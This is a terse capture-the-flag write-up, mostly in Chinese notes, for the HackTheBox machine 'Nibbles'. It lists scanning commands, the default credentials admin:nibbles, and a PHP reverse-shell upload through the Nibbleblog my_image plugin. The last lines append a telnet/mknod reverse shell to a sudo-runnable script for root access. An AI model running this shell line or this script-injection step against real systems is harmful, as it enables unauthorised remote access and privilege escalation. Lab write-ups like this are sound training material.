HackTheBox >_ Nibbles_75
Published on 20 Nov 2020
Nibbles_75
rustscan 10.10.10.75 -b 924 -t 1500 --no-nmap
nmap -sV -T5 -Pn -oX sploit.xml -vvv -p22,80 10.10.10.75 ; searchsploit --nmap sploit.xml
sudo nmap -v -Pn -T4 -sC -sV -p22,80 10.10.10.75
dirsearch -u http://10.10.10.75/nibbleblog -e js,html,php,py,asp,aspx,bak,txt
默认凭证
admin:nibbles
查看之前找到的msf脚本
上传payload的位置应该在 plugins=>config=>my_image
上传php reverse shell
根据rb脚本
浏览
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
立即在监听处获得shell
python3 -c "import pty; pty.spawn(['/bin/bash']);"
有压缩文件,未展开
原文件已经没有,只有一个压缩文件//
unzip unzip personal.zip
权限:可写
echo "mknod backpipe p && telnet 10.10.14.24 1338 0<backpipe | /bin/bash 1>backpipe" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh